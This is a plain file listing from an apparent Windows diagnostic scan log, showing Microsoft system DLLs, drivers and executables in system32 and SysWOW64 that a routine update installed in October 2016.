2016-10-15 15:28 - 2016-09-30 09:28 - 00346312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-10-15 15:28 - 2016-09-30 05:37 - 05548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-10-15 15:28 - 2016-09-30 05:20 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2016-10-15 15:28 - 2016-09-30 05:20 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2016-10-15 15:28 - 2016-09-29 21:55 - 25765376 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-10-15 15:28 - 2016-09-29 20:41 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-10-15 15:28 - 2016-09-29 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2016-10-15 15:28 - 2016-09-29 20:26 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-10-15 15:28 - 2016-09-29 20:25 - 02895360 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-10-15 15:28 - 2016-09-29 20:25 - 00576000 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-10-15 15:28 - 2016-09-29 20:25 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-10-15 15:28 - 2016-09-29 20:25 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-10-15 15:28 - 2016-09-29 20:25 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2016-10-15 15:28 - 2016-09-29 20:18 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-10-15 15:28 - 2016-09-29 20:17 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2016-10-15 15:28 - 2016-09-29 20:14 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-10-15 15:28 - 2016-09-29 20:13 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-10-15 15:28 - 2016-09-29 20:13 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2016-10-15 15:28 - 2016-09-29 20:12 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-10-15 15:28 - 2016-09-29 20:12 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-10-15 15:28 - 2016-09-29 20:09 - 06048256 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-10-15 15:28 - 2016-09-29 20:05 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2016-10-15 15:28 - 2016-09-29 20:02 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-10-15 15:28 - 2016-09-29 19:55 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2016-10-15 15:28 - 2016-09-29 19:54 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-10-15 15:28 - 2016-09-29 19:54 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2016-10-15 15:28 - 2016-09-29 19:51 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-10-15 15:28 - 2016-09-29 19:50 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-10-15 15:28 - 2016-09-29 19:47 - 20306944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-10-15 15:28 - 2016-09-29 19:47 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-10-15 15:28 - 2016-09-29 19:46 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2016-10-15 15:28 - 2016-09-29 19:42 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-10-15 15:28 - 2016-09-29 19:42 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-10-15 15:28 - 2016-09-29 19:42 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2016-10-15 15:28 - 2016-09-29 19:42 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2016-10-15 15:28 - 2016-09-29 19:41 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2016-10-15 15:28 - 2016-09-29 19:38 - 02286592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-10-15 15:28 - 2016-09-29 19:36 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-10-15 15:28 - 2016-09-29 19:35 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-10-15 15:28 - 2016-09-29 19:35 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2016-10-15 15:28 - 2016-09-29 19:33 - 00724992 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-10-15 15:28 - 2016-09-29 19:33 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-10-15 15:28 - 2016-09-29 19:32 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-10-15 15:28 - 2016-09-29 19:32 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-10-15 15:28 - 2016-09-29 19:32 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2016-10-15 15:28 - 2016-09-29 19:32 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-10-15 15:28 - 2016-09-29 19:31 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-10-15 15:28 - 2016-09-29 19:31 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2016-10-15 15:28 - 2016-09-29 19:24 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-10-15 15:28 - 2016-09-29 19:21 - 15257088 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-10-15 15:28 - 2016-09-29 19:19 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2016-10-15 15:28 - 2016-09-29 19:19 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2016-10-15 15:28 - 2016-09-29 19:17 - 02920960 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-10-15 15:28 - 2016-09-29 19:17 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2016-10-15 15:28 - 2016-09-29 19:15 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-10-15 15:28 - 2016-09-29 19:14 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-10-15 15:28 - 2016-09-29 19:13 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2016-10-15 15:28 - 2016-09-29 19:12 - 04608512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-10-15 15:28 - 2016-09-29 19:07 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-10-15 15:28 - 2016-09-29 19:05 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-10-15 15:28 - 2016-09-29 19:05 - 01544192 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-10-15 15:28 - 2016-09-29 19:05 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2016-10-15 15:28 - 2016-09-29 19:05 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-10-15 15:28 - 2016-09-29 19:03 - 13653504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-10-15 15:28 - 2016-09-29 18:54 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-10-15 15:28 - 2016-09-29 18:46 - 02444288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-10-15 15:28 - 2016-09-29 18:43 - 01312768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-10-15 15:28 - 2016-09-29 18:42 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-10-15 15:28 - 2016-09-15 05:30 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-10-15 15:28 - 2016-09-15 05:30 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2016-10-15 15:28 - 2016-09-15 05:15 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2016-10-15 15:28 - 2016-09-15 05:15 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2016-10-15 15:28 - 2016-09-12 11:13 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-10-15 15:28 - 2016-09-12 11:13 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-10-15 15:28 - 2016-09-12 11:08 - 01465344 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00316416 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\adsmsext.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00260608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adsmsext.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2016-10-15 15:28 - 2016-09-12 10:39 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-10-15 15:28 - 2016-09-12 10:37 - 03218944 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-10-15 15:28 - 2016-09-12 10:32 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-10-15 15:28 - 2016-09-12 10:32 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-10-15 15:28 - 2016-09-12 10:32 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-10-15 15:28 - 2016-09-12 10:31 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-10-15 15:28 - 2016-09-12 10:29 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2016-10-15 15:28 - 2016-09-12 10:25 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2016-10-15 15:28 - 2016-09-12 09:08 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2016-10-15 15:28 - 2016-09-12 08:43 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2016-10-15 15:28 - 2016-09-12 08:43 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2016-10-15 15:28 - 2016-09-10 06:19 - 03649536 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll
2016-10-15 15:28 - 2016-09-10 05:53 - 02291712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll
2016-10-15 15:28 - 2016-09-09 08:29 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-10-15 15:28 - 2016-09-09 08:26 - 00706280 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-10-15 15:28 - 2016-09-09 08:23 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:01 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-10-15 15:28 - 2016-09-09 08:00 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2016-10-15 15:28 - 2016-09-09 08:00 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-10-15 15:28 - 2016-09-09 08:00 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2016-10-15 15:28 - 2016-09-09 08:00 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:51 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2016-10-15 15:28 - 2016-09-09 07:51 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-10-15 15:28 - 2016-09-09 07:51 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2016-10-15 15:28 - 2016-09-09 07:48 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2016-10-15 15:28 - 2016-09-09 07:47 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-10-15 15:28 - 2016-09-09 07:43 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-10-15 15:28 - 2016-09-09 07:38 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-10-15 15:28 - 2016-09-09 07:38 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-10-15 15:28 - 2016-09-09 07:38 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2016-10-15 15:28 - 2016-09-09 07:38 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-10-15 15:28 - 2016-09-09 07:37 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:37 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-10-15 15:28 - 2016-09-08 10:34 - 00263680 _____ (Microsoft Corporation) C:\Windows\system32\WebClnt.dll
2016-10-15 15:28 - 2016-09-08 10:34 - 00208896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WebClnt.dll
2016-10-15 15:28 - 2016-09-08 10:34 - 00108544 _____ (Microsoft Corporation) C:\Windows\system32\davclnt.dll
2016-10-15 15:28 - 2016-09-08 10:34 - 00087040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\davclnt.dll
2016-10-15 15:28 - 2016-09-08 04:55 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
